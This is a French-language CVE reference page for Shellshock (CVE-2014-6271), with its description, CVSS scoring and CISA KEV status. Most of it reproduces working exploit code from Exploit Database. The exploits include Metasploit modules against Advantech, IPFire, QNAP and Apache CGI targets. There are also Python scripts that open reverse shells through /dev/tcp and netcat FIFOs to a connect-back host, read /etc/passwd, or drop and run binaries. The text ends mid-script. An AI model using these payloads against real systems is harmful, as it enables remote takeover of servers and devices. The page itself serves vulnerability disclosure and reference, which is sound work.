CVE-2014-6271 : Détail

CVE-2014-6271

9.8
/
Critique
OS Command Injection
A03-Injection
94.22%V4
Network
2014-09-24
18h00 +00:00
2025-02-07
13h47 +00:00
CVE.org
NVD
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka "ShellShock." NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V3.1 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Base: Exploitabilty Metrics

The Exploitability metrics reflect the characteristics of the thing that is vulnerable, which we refer to formally as the vulnerable component.

Attack Vector

This metric reflects the context by which vulnerability exploitation is possible.

Network

The vulnerable component is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers).

Attack Complexity

This metric describes the conditions beyond the attacker’s control that must exist in order to exploit the vulnerability.

Low

Specialized access conditions or extenuating circumstances do not exist. An attacker can expect repeatable success when attacking the vulnerable component.

Privileges Required

This metric describes the level of privileges an attacker must possess before successfully exploiting the vulnerability.

None

The attacker is unauthorized prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack.

User Interaction

This metric captures the requirement for a human user, other than the attacker, to participate in the successful compromise of the vulnerable component.

None

The vulnerable system can be exploited without interaction from any user.

Base: Scope Metrics

The Scope metric captures whether a vulnerability in one vulnerable component impacts resources in components beyond its security scope.

Scope

Formally, a security authority is a mechanism (e.g., an application, an operating system, firmware, a sandbox environment) that defines and enforces access control in terms of how certain subjects/actors (e.g., human users, processes) can access certain restricted objects/resources (e.g., files, CPU, memory) in a controlled manner. All the subjects and objects under the jurisdiction of a single security authority are considered to be under one security scope. If a vulnerability in a vulnerable component can affect a component which is in a different security scope than the vulnerable component, a Scope change occurs. Intuitively, whenever the impact of a vulnerability breaches a security/trust boundary and impacts components outside the security scope in which vulnerable component resides, a Scope change occurs.

Unchanged

An exploited vulnerability can only affect resources managed by the same security authority. In this case, the vulnerable component and the impacted component are either the same, or both are managed by the same security authority.

Base: Impact Metrics

The Impact metrics capture the effects of a successfully exploited vulnerability on the component that suffers the worst outcome that is most directly and predictably associated with the attack. Analysts should constrain impacts to a reasonable, final outcome which they are confident an attacker is able to achieve.

Confidentiality Impact

This metric measures the impact to the confidentiality of the information resources managed by a software component due to a successfully exploited vulnerability.

High

There is a total loss of confidentiality, resulting in all resources within the impacted component being divulged to the attacker. Alternatively, access to only some restricted information is obtained, but the disclosed information presents a direct, serious impact. For example, an attacker steals the administrator's password, or private encryption keys of a web server.

Integrity Impact

This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information.

High

There is a total loss of integrity, or a complete loss of protection. For example, the attacker is able to modify any/all files protected by the impacted component. Alternatively, only some files can be modified, but malicious modification would present a direct, serious consequence to the impacted component.

Availability Impact

This metric measures the impact to the availability of the impacted component resulting from a successfully exploited vulnerability.

High

There is a total loss of availability, resulting in the attacker being able to fully deny access to resources in the impacted component; this loss is either sustained (while the attacker continues to deliver the attack) or persistent (the condition persists even after the attack has completed). Alternatively, the attacker has the ability to deny some availability, but the loss of availability presents a direct, serious consequence to the impacted component (e.g., the attacker cannot disrupt existing connections, but can prevent new connections; the attacker can repeatedly exploit a vulnerability that, in each instance of a successful attack, leaks a only small amount of memory, but after repeated exploitation causes a service to become completely unavailable).

Temporal Metrics

The Temporal metrics measure the current state of exploit techniques or code availability, the existence of any patches or workarounds, or the confidence in the description of a vulnerability.

Environmental Metrics

These metrics enable the analyst to customize the CVSS score depending on the importance of the affected IT asset to a user’s organization, measured in terms of Confidentiality, Integrity, and Availability.

 nvd@nist.gov
V2 10 AV:N/AC:L/Au:N/C:C/I:C/A:C nvd@nist.gov

CISA KEV (Vulnérabilités Exploitées Connues)

Nom de la vulnérabilité : GNU Bourne-Again Shell (Bash) Arbitrary Code Execution Vulnerability

Action requise : Apply updates per vendor instructions.

Connu pour être utilisé dans des campagnes de ransomware : Unknown

Ajouter le : 2022-01-27 23h00 +00:00

Action attendue : 2022-07-27 22h00 +00:00

Informations importantes
Ce CVE est identifié comme vulnérable et constitue une menace active, selon le Catalogue des Vulnérabilités Exploitées Connues (CISA KEV). La CISA a répertorié cette vulnérabilité comme étant activement exploitée par des cybercriminels, soulignant ainsi l'importance de prendre des mesures immédiates pour remédier à cette faille. Il est impératif de prioriser la mise à jour et la correction de ce CVE afin de protéger les systèmes contre les potentielles cyberattaques.

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
EPSS First.org

Informations sur l'Exploit

Exploit Database EDB-ID : 38849

Date de publication : 2015-12-01 23h00 +00:00
Auteur : Metasploit
EDB Vérifié : Yes

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit4 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Advantech Switch Bash Environment Variable Code Injection (Shellshock)', 'Description' => %q{ This module exploits the Shellshock vulnerability, a flaw in how the Bash shell handles external environment variables. This module targets the 'ping.sh' CGI script, acessible through the Boa web server on Advantech switches. This module was tested against firmware version 1322_D1.98. }, 'Author' => 'hdm', 'References' => [ ['CVE', '2014-6271'], ['CWE', '94'], ['OSVDB', '112004'], ['EDB', '34765'], ['URL', 'https://community.rapid7.com/community/infosec/blog/2015/12/01/r7-2015-25-advantech-eki-multiple-known-vulnerabilities'], ['URL', 'https://access.redhat.com/articles/1200223'], ['URL', 'http://seclists.org/oss-sec/2014/q3/649'] ], 'Privileged' => false, 'Arch' => ARCH_CMD, 'Platform' => 'unix', 'Payload' => { 'Space' => 1024, 'BadChars' => "\x00\x0A\x0D", 'DisableNops' => true, 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'openssl generic' } }, 'Targets' => [[ 'Automatic Targeting', { 'auto' => true } ]], 'DefaultTarget' => 0, 'License' => MSF_LICENSE, 'DisclosureDate' => 'Dec 01 2015' )) register_options([ Opt::RPORT(80) ], self.class) end # # CVE-2014-6271 # def cve_2014_6271(cmd) %{() { :;}; $(#{cmd}) & } end # # Check credentials # def check res = send_request_cgi( 'method' => 'GET', 'uri' => '/cgi-bin/ping.sh' ) if !res vprint_error("#{peer} - No response from host") return Exploit::CheckCode::Unknown elsif res.headers['Server'] =~ /Boa\/(.*)/ vprint_status("#{peer} - Found Boa version #{$1}") else print_status("#{peer} - Target is not a Boa web server") return Exploit::CheckCode::Safe end if res.body.to_s.index('127.0.0.1 ping statistics') return Exploit::CheckCode::Detected else vprint_error("#{peer} - Target does not appear to be an Advantech switch") return Expoit::CheckCode::Safe end end # # Exploit # def exploit cmd = cve_2014_6271(payload.encoded) vprint_status("#{peer} - Trying to run command '#{cmd}'") res = send_request_cgi( 'method' => 'GET', 'uri' => '/cgi-bin/ping.sh', 'agent' => cmd ) end end
Exploit Database EDB-ID : 34777

Date de publication : 2014-09-24 22h00 +00:00
Auteur : Shaun Colley
EDB Vérifié : Yes

require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'bashedCgi', 'Description' => %q{ Quick & dirty module to send the BASH exploit payload (CVE-2014-6271) to CGI scripts that are BASH-based or invoke BASH, to execute an arbitrary shell command. }, 'Author' => [ 'Stephane Chazelas', # vuln discovery 'Shaun Colley <scolley at ioactive.com>' # metasploit module ], 'License' => MSF_LICENSE, 'References' => [ 'CVE', '2014-6271' ], 'Targets' => [ [ 'cgi', {} ] ], 'DefaultTarget' => 0, 'Payload' => { 'Space' => 1024, 'DisableNops' => true }, 'DefaultOptions' => { 'PAYLOAD' => 0 } )) register_options( [ OptString.new('TARGETURI', [true, 'Absolute path of BASH-based CGI', '/']), OptString.new('CMD', [true, 'Command to execute', '/usr/bin/touch /tmp/metasploit']) ], self.class) end def run res = send_request_cgi({ 'method' => 'GET', 'uri' => datastore['TARGETURI'], 'agent' => "() { :;}; " + datastore['CMD'] }) if res && res.code == 200 print_good("Command sent - 200 received") else print_error("Command sent - non-200 reponse") end end end
Exploit Database EDB-ID : 39918

Date de publication : 2016-06-09 22h00 +00:00
Auteur : Metasploit
EDB Vérifié : Yes

## ## This module requires Metasploit: http://metasploit.com/download ## Current source: https://github.com/rapid7/metasploit-framework ### require 'msf/core' class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super( update_info( info, 'Name' => 'IPFire Bash Environment Variable Injection (Shellshock)', 'Description' => %q( IPFire, a free linux based open source firewall distribution, version <= 2.15 Update Core 82 contains an authenticated remote command execution vulnerability via shellshock in the request headers. ), 'Author' => [ 'h00die <mike@stcyrsecurity.com>', # module 'Claudio Viviani' # discovery ], 'References' => [ [ 'EDB', '34839' ], [ 'CVE', '2014-6271'] ], 'License' => MSF_LICENSE, 'Platform' => %w( linux unix ), 'Privileged' => false, 'DefaultOptions' => { 'SSL' => true, 'PAYLOAD' => 'cmd/unix/generic' }, 'Arch' => ARCH_CMD, 'Payload' => { 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic' } }, 'Targets' => [ [ 'Automatic Target', {}] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Sep 29 2014' ) ) register_options( [ OptString.new('USERNAME', [ true, 'User to login with', 'admin']), OptString.new('PASSWORD', [ false, 'Password to login with', '']), Opt::RPORT(444) ], self.class ) end def check begin res = send_request_cgi( 'uri' => '/cgi-bin/index.cgi', 'method' => 'GET' ) fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil? fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") if res.code == 401 /\<strong\>IPFire (?<version>[\d.]{4}) \([\w]+\) - Core Update (?<update>[\d]+)/ =~ res.body if version && update && version == "2.15" && update.to_i < 83 Exploit::CheckCode::Appears else Exploit::CheckCode::Safe end rescue ::Rex::ConnectionError fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") end end # # CVE-2014-6271 # def cve_2014_6271(cmd) %{() { :;}; /bin/bash -c "#{cmd}" } end def exploit begin payload = cve_2014_6271(datastore['CMD']) vprint_status("Exploiting with payload: #{payload}") res = send_request_cgi( 'uri' => '/cgi-bin/index.cgi', 'method' => 'GET', 'headers' => { 'VULN' => payload } ) fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil? fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") if res.code == 401 /<li>Device: \/dev\/(?<output>.+) reports/m =~ res.body print_good(output) unless output.nil? rescue ::Rex::ConnectionError fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") end end end
Exploit Database EDB-ID : 34895

Date de publication : 2014-10-05 22h00 +00:00
Auteur : Fady Mohammed Osman
EDB Vérifié : Yes

## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE def initialize(info = {}) super(update_info(info, 'Name' => 'Shellshock Bashed CGI RCE', 'Description' => %q{ This module exploits the shellshock vulnerability in apache cgi. It allows you to excute any metasploit payload you want. }, 'Author' => [ 'Stephane Chazelas', # vuln discovery 'Fady Mohamed Osman' # Metasploit module f.othman at zinad.net ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2014-6271' ] ], 'Payload' => { 'BadChars' => "", }, 'Platform' => 'linux', 'Arch' => ARCH_X86, 'Targets' => [ [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Aug 13 2014')) register_options( [ OptString.new('TARGETURI', [true, 'The CGI url', '/cgi-bin/test.sh']) , OptString.new('FILEPATH', [true, 'The url ', '/tmp']) ], self.class) end def exploit @payload_name = "#{rand_text_alpha(5)}" full_path = datastore['FILEPATH'] + '/' + @payload_name payload_exe = generate_payload_exe if payload_exe.blank? fail_with(Failure::BadConfig, "#{peer} - Failed to generate the ELF, select a native payload") end peer = "#{rhost}:#{rport}" print_status("#{peer} - Creating payload #{full_path}") res = send_request_cgi({ 'method' => 'GET', 'uri' => datastore['TARGETURI'], 'agent' => "() { :;}; /bin/bash -c \"" + "printf " + "\'" + Rex::Text.hexify(payload_exe).gsub("\n",'') + "\'" + "> #{full_path}; chmod +x #{full_path};#{full_path};rm #{full_path};\"" }) end end
Exploit Database EDB-ID : 34839

Date de publication : 2014-09-30 22h00 +00:00
Auteur : Claudio Viviani
EDB Vérifié : Yes

#!/usr/bin/env python # # Exploit Title : IPFire <= 2.15 core 82 Authenticated cgi Remote Command Injection (ShellShock) # # Exploit Author : Claudio Viviani # # Vendor Homepage : http://www.ipfire.org # # Software Link: http://downloads.ipfire.org/releases/ipfire-2.x/2.15-core82/ipfire-2.15.i586-full-core82.iso # # Date : 2014-09-29 # # Fixed version: IPFire 2.15 core 83 (2014-09-28) # # Info: IPFire is a free Linux distribution which acts as a router and firewall in the first instance. # It can be maintained via a web interface. # The distribution furthermore offers selected server-daemons and can easily be expanded to a SOHO-server. # IPFire is based on Linux From Scratch and is, like the Endian Firewall, originally a fork from IPCop. # # Vulnerability: IPFire <= 2.15 core 82 Cgi Web Interface suffers from Authenticated Bash Environment Variable Code Injection # (CVE-2014-6271) # # Suggestion: # # If you can't update the distro and you have installed ipfire via image files (Arm, Flash) # make sure to change the default access permission to graphical user interface (user:admin pass:ipfire) # # # http connection import urllib2 # Basic Auth management Base64 import base64 # Args management import optparse # Error management import sys banner = """ ___ _______ _______ __ _______ __ | | _ | _ |__.----.-----. | _ .-----|__| |. |. 1 |. 1___| | _| -__| |. 1___| _ | | |. |. ____|. __) |__|__| |_____| |. |___|___ |__| |: |: | |: | |: 1 |_____| |::.|::.| |::.| |::.. . | `---`---' `---' `-------' _______ __ __ __ _______ __ __ | _ | |--.-----| | | _ | |--.-----.----| |--. | 1___| | -__| | | 1___| | _ | __| < |____ |__|__|_____|__|__|____ |__|__|_____|____|__|__| |: 1 | |: 1 | |::.. . | |::.. . | `-------' `-------' IPFire <= 2.15 c0re 82 Authenticated Cgi Sh3llSh0ck r3m0t3 C0mm4nd Inj3ct10n Written by: Claudio Viviani http://www.homelab.it info@homelab.it homelabit@protonmail.ch https://www.facebook.com/homelabit https://twitter.com/homelabit https://plus.google.com/+HomelabIt1/ https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww """ # Check url def checkurl(url): if url[:8] != "https://" and url[:7] != "http://": print('[X] You must insert http:// or https:// procotol') sys.exit(1) else: return url def connectionScan(url,user,pwd,cmd): print '[+] Connection in progress...' try: response = urllib2.Request(url) content = urllib2.urlopen(response) print '[X] IPFire Basic Authentication not found' except urllib2.HTTPError, e: if e.code == 404: print '[X] Page not found' elif e.code == 401: try: print '[+] Authentication in progress...' base64string = base64.encodestring('%s:%s' % (user, pwd)).replace('\n', '') headers = {'VULN' : '() { :;}; echo "H0m3l4b1t"; /bin/bash -c "'+cmd+'"' } response = urllib2.Request(url, None, headers) response.add_header("Authorization", "Basic %s" % base64string) content = urllib2.urlopen(response).read() if "ipfire" in content: print '[+] Username & Password: OK' print '[+] Checking for vulnerability...' if 'H0m3l4b1t' in content: print '[!] Command "'+cmd+'": INJECTED!' else: print '[X] Not Vulnerable :(' else: print '[X] No IPFire page found' except urllib2.HTTPError, e: if e.code == 401: print '[X] Wrong username or password' else: print '[X] HTTP Error: '+str(e.code) except urllib2.URLError: print '[X] Connection Error' else: print '[X] HTTP Error: '+str(e.code) except urllib2.URLError: print '[X] Connection Error' commandList = optparse.OptionParser('usage: %prog -t https://target:444/ -u admin -p pwd -c "touch /tmp/test.txt"') commandList.add_option('-t', '--target', action="store", help="Insert TARGET URL", ) commandList.add_option('-c', '--cmd', action="store", help="Insert command name", ) commandList.add_option('-u', '--user', action="store", help="Insert username", ) commandList.add_option('-p', '--pwd', action="store", help="Insert password", ) options, remainder = commandList.parse_args() # Check args if not options.target or not options.cmd or not options.user or not options.pwd: print(banner) commandList.print_help() sys.exit(1) print(banner) url = checkurl(options.target) cmd = options.cmd user = options.user pwd = options.pwd connectionScan(url,user,pwd,cmd)
Exploit Database EDB-ID : 36503

Date de publication : 2015-03-25 23h00 +00:00
Auteur : Patrick Pellegrino
EDB Vérifié : No

# Exploit Title: QNAP admin shell via Bash Environment Variable Code Injection # Date: 7 February 2015 # Exploit Author: Patrick Pellegrino | 0x700x700x650x6c0x6c0x650x670x720x690x6e0x6f@securegroup.it [work] / 0x640x330x760x620x700x70@gmail.com [other] # Employer homepage: http://www.securegroup.it # Vendor homepage: http://www.qnap.com # Version: All Turbo NAS models except TS-100, TS-101, TS-200 # Tested on: TS-1279U-RP # CVE : 2014-6271 # Vendor URL bulletin : http://www.qnap.com/i/it/support/con_show.php?cid=61 ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/d3vpp/metasploit-modules ## require 'msf/core' require 'net/telnet' class Metasploit3 < Msf::Auxiliary Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::CommandShell def initialize(info = {}) super(update_info(info, 'Name' => 'QNAP admin shell via Bash Environment Variable Code Injection', 'Description' => %q{ This module allows you to spawn a remote admin shell (utelnetd) on a QNAP device via Bash Environment Variable Code Injection. Affected products: All Turbo NAS models except TS-100, TS-101, TS-200 }, 'Author' => ['Patrick Pellegrino'], # Metasploit module | 0x700x700x650x6c0x6c0x650x670x720x690x6e0x6f@securegroup.it [work] / 0x640x330x760x620x700x70@gmail.com [other] 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2014-6271'], #aka ShellShock ['URL', 'http://www.qnap.com/i/it/support/con_show.php?cid=61'] ], 'Platform' => ['unix'] )) register_options([ OptString.new('TARGETURI', [true, 'Path to CGI script','/cgi-bin/index.cgi']), OptPort.new('LTELNET', [true, 'Set the remote port where the utelnetd service will be listening','9993']) ], self.class) end def check begin res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path), 'agent' => "() { :;}; echo; /usr/bin/id" }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE vprint_error("Connection failed") return Exploit::CheckCode::Unknown end if !res return Exploit::CheckCode::Unknown elsif res.code== 302 and res.body.include? 'uid' return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Safe end def exploit_telnet() telnetport = datastore['LTELNET'] print_status("#{rhost}:#{rport} - Telnet port used: #{telnetport}") print_status("#{rhost}:#{rport} - Sending exploit") begin sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i }) if sock print_good("#{rhost}:#{rport} - Backdoor service spawned") add_socket(sock) else fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service not spawned") end print_status "Starting a Telnet session #{rhost}:#{telnetport}" merge_me = { 'USERPASS_FILE' => nil, 'USER_FILE' => nil, 'PASS_FILE' => nil, 'USERNAME' => nil, 'PASSWORD' => nil } start_session(self, "TELNET (#{rhost}:#{telnetport})", merge_me, false, sock) rescue fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service not handled") end return end def run begin telnetport = datastore['LTELNET'] res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path), 'agent' => "() { :;}; /bin/utelnetd -l/bin/sh -p#{telnetport} &" }) rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable => e fail_with(Failure::Unreachable, e) ensure disconnect end exploit_telnet() end end
Exploit Database EDB-ID : 36504

Date de publication : 2015-03-25 23h00 +00:00
Auteur : Patrick Pellegrino
EDB Vérifié : No

# Exploit Title: QNAP Web server remote code execution via Bash Environment Variable Code Injection # Date: 7 February 2015 # Exploit Author: Patrick Pellegrino | 0x700x700x650x6c0x6c0x650x670x720x690x6e0x6f@securegroup.it [work] / 0x640x330x760x620x700x70@gmail.com [other] # Employer homepage: http://www.securegroup.it # Vendor homepage: http://www.qnap.com # Version: All Turbo NAS models except TS-100, TS-101, TS-200 # Tested on: TS-1279U-RP # CVE : 2014-6271 # Vendor URL bulletin : http://www.qnap.com/i/it/support/con_show.php?cid=61 ## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/d3vpp/metasploit-modules ## require 'msf/core' class Metasploit3 < Msf::Auxiliary Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'QNAP Web server remote code execution via Bash Environment Variable Code Injection', 'Description' => %q{ This module allows you to inject unix command with the same user who runs the http service - admin - directly on the QNAP system. Affected products: All Turbo NAS models except TS-100, TS-101, TS-200 }, 'Author' => ['Patrick Pellegrino'], # Metasploit module | 0x700x700x650x6c0x6c0x650x670x720x690x6e0x6f@securegroup.it [work] / 0x640x330x760x620x700x70@gmail.com [other] 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2014-6271'], #aka ShellShock ['URL', 'http://www.qnap.com/i/it/support/con_show.php?cid=61'] ], 'Platform' => ['unix'] )) register_options([ OptString.new('TARGETURI', [true, 'Path to CGI script','/cgi-bin/index.cgi']), OptString.new('CMD', [ true, 'The command to run', '/bin/cat /etc/passwd']) ], self.class) end def check begin res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path), 'agent' => "() { :;}; echo; /usr/bin/id" }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE vprint_error("Connection failed") return Exploit::CheckCode::Unknown end if !res return Exploit::CheckCode::Unknown elsif res.code== 302 and res.body.include? 'uid' return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Safe end def run res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path), 'agent' => "() { :;}; echo; #{datastore['CMD']}" }) if res.body.empty? print_error("No data found.") elsif res.code== 302 print_status("#{rhost}:#{rport} - bash env variable injected") puts " " print_line(res.body) end end end
Exploit Database EDB-ID : 40619

Date de publication : 2016-10-20 22h00 +00:00
Auteur : Hacker Fantastic
EDB Vérifié : No

#!/usr/bin/env python # TrendMicro InterScan Web Security Virtul Appliance # ================================================== # InterScan Web Security is a software virtual appliance that # dynamically protects against the ever-growing flood of web # threats at the Internet gateway exclusively designed to secure # you against traditional and emerging web threats at the Internet # gateway. The appliance however is shipped with a vulnerable # version of Bash susceptible to shellshock (I know right?). An # attacker can exploit this vulnerability by calling the CGI # shellscript "/cgi-bin/cgiCmdNotify" which can be exploited # to perform arbitrary code execution. A limitation of this # vulnerability is that the attacker must have credentials for # the admin web interface to exploit this flaw. The panel runs # over HTTP by default so a man-in-the-middle attack could be # used to gain credentials and compromise the appliance. # # $ python trendmicro_IWSVA_shellshock.py 192.168.56.101 admin password 192.168.56.1 # [+] TrendMicro InterScan Web Security Virtual Appliance CVE-2014-6271 exploit # [-] Authenticating to '192.168.56.101' with 'admin' 'password' # [-] JSESSIONID = DDE38E62757ADC00A51311F1F953EEBA # [-] exploiting shellshock CVE-2014-6271... # bash: no job control in this shell # bash-4.1$ id # uid=498(iscan) gid=499(iscan) groups=499(iscan) # # -- Hacker Fantastic # # (https://www.myhackerhouse.com) import requests import sys import os def spawn_listener(): os.system("nc -l 8080") def shellshock(ip,session,cbip): user_agent = {'User-agent': '() { :; }; /bin/bash -i >& /dev/tcp/'+cbip+'/8080 0>&1'} cookies = {'JSESSIONID': session} print "[-] exploiting shellshock CVE-2014-6271..." myreq = requests.get("http://"+ip+":1812/cgi-bin/cgiCmdNotify", headers = user_agent, cookies = cookies) def login_http(ip,user,password): mydata = {'wherefrom':'','wronglogon':'no','uid':user, 'passwd':password,'pwd':'Log+On'} print "[-] Authenticating to '%s' with '%s' '%s'" % (ip,user,password) myreq = requests.post("http://"+ip+":1812/uilogonsubmit.jsp", data=mydata) session_cookie = myreq.history[0].cookies.get('JSESSIONID') print "[-] JSESSIONID = %s" % session_cookie return session_cookie if __name__ == "__main__": print "[+] TrendMicro InterScan Web Security Virtual Appliance CVE-2014-6271 exploit" if len(sys.argv) < 5: print "[-] use with <ip> <user> <pass> <connectback_ip>" sys.exit() newRef=os.fork() if newRef==0: spawn_listener() else: session = login_http(sys.argv[1],sys.argv[2],sys.argv[3]) shellshock(sys.argv[1],session,sys.argv[4])
Exploit Database EDB-ID : 40938

Date de publication : 2016-12-17 23h00 +00:00
Auteur : Hacker Fantastic
EDB Vérifié : Yes

#!/usr/bin/env python # RedStar OS 3.0 Server (BEAM & RSSMON) shellshock exploit # ======================================================== # BEAM & RSSMON are Webmin based configuration utilities # that ship with RSS server 3.0. These packages are the # recommended GUI configuration components and listen on # a user specified port from 10000/tcp to 65535/tcp. They # are accessible on the local host only in vanilla install # unless the firewall is disabled. Both services run with # full root permissions and can be exploited for LPE or # network attacks. RSSMON has hardened SELinux policies # applied which hinder exploitation of this vulnerability # be limiting access to network resources. Commands are # still run as root in a blind way. # # $ python rsshellshock.py beam 192.168.0.31 10000 192.168.0.10 8080 # [+] RedStar OS 3.0 Server (BEAM & RSSMON) shellshock exploit # [-] exploiting shellshock CVE-2014-6271... # sh: no job control in this shell # sh-4.1# id # uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:beam_t:s0-s15:c0.c1023 # sh-4.1# # # -- Hacker Fantastic (https://myhackerhouse.com) from requests.packages.urllib3.exceptions import InsecureRequestWarning import subprocess import requests import sys import os def spawn_shell(cbport): subprocess.call('nc -l ' + cbport, shell=True) def shellshock(soft,ip,port,cbip,cbport): requests.packages.urllib3.disable_warnings(InsecureRequestWarning) if soft == "beam": user_agent = {'User-agent': '() { :; }; /bin/bash -c "rm /tmp/.f;mkfifo /tmp/.f;cat /tmp/.f|/bin/sh -i 2>&1|nc '+cbip+' '+cbport+' >/tmp/.f"'} else: shellstring = '() { :; }; /bin/bash -c "%s"' % (cbip) user_agent = {'User-agent': shellstring} print "[-] exploiting shellshock CVE-2014-6271..." myreq = requests.get("https://"+ip+":"+port+"/session_login.cgi", headers = user_agent, verify=False) if __name__ == "__main__": print "[+] RedStar OS 3.0 Server (BEAM & RSSMON) shellshock exploit" if len(sys.argv) < 5: print "[-] Use with <beam> <host> <port> <connectback ip> <connectback port>" print "[-] Or with <rssmon> <host> <port> <cmd>" sys.exit() if(sys.argv[1]=="beam"): newRef=os.fork() if newRef==0: shellshock(sys.argv[1],sys.argv[2],sys.argv[3],sys.argv[4],sys.argv[5]) else: spawn_shell(sys.argv[5]) else: shellshock(sys.argv[1],sys.argv[2],sys.argv[3],sys.argv[4],0)
Exploit Database EDB-ID : 34900

Date de publication : 2014-10-05 22h00 +00:00
Auteur : Federico Galatolo
EDB Vérifié : Yes

#!/usr/bin/env python from socket import * from threading import Thread import thread, time, httplib, urllib, sys stop = False proxyhost = "" proxyport = 0 def usage(): print """ Shellshock apache mod_cgi remote exploit Usage: ./exploit.py var=<value> Vars: rhost: victim host rport: victim port for TCP shell binding lhost: attacker host for TCP shell reversing lport: attacker port for TCP shell reversing pages: specific cgi vulnerable pages (separated by comma) proxy: host:port proxy Payloads: "reverse" (unix unversal) TCP reverse shell (Requires: rhost, lhost, lport) "bind" (uses non-bsd netcat) TCP bind shell (Requires: rhost, rport) Example: ./exploit.py payload=reverse rhost=1.2.3.4 lhost=5.6.7.8 lport=1234 ./exploit.py payload=bind rhost=1.2.3.4 rport=1234 Credits: Federico Galatolo 2014 """ sys.exit(0) def exploit(lhost,lport,rhost,rport,payload,pages): headers = {"Cookie": payload, "Referer": payload} for page in pages: if stop: return print "[-] Trying exploit on : "+page if proxyhost != "": c = httplib.HTTPConnection(proxyhost,proxyport) c.request("GET","http://"+rhost+page,headers=headers) res = c.getresponse() else: c = httplib.HTTPConnection(rhost) c.request("GET",page,headers=headers) res = c.getresponse() if res.status == 404: print "[*] 404 on : "+page time.sleep(1) args = {} for arg in sys.argv[1:]: ar = arg.split("=") args[ar[0]] = ar[1] try: args['payload'] except: usage() if args['payload'] == 'reverse': try: lhost = args['lhost'] lport = int(args['lport']) rhost = args['rhost'] payload = "() { :;}; /bin/bash -c /bin/bash -i >& /dev/tcp/"+lhost+"/"+str(lport)+" 0>&1 &" except: usage() elif args['payload'] == 'bind': try: rhost = args['rhost'] rport = args['rport'] payload = "() { :;}; /bin/bash 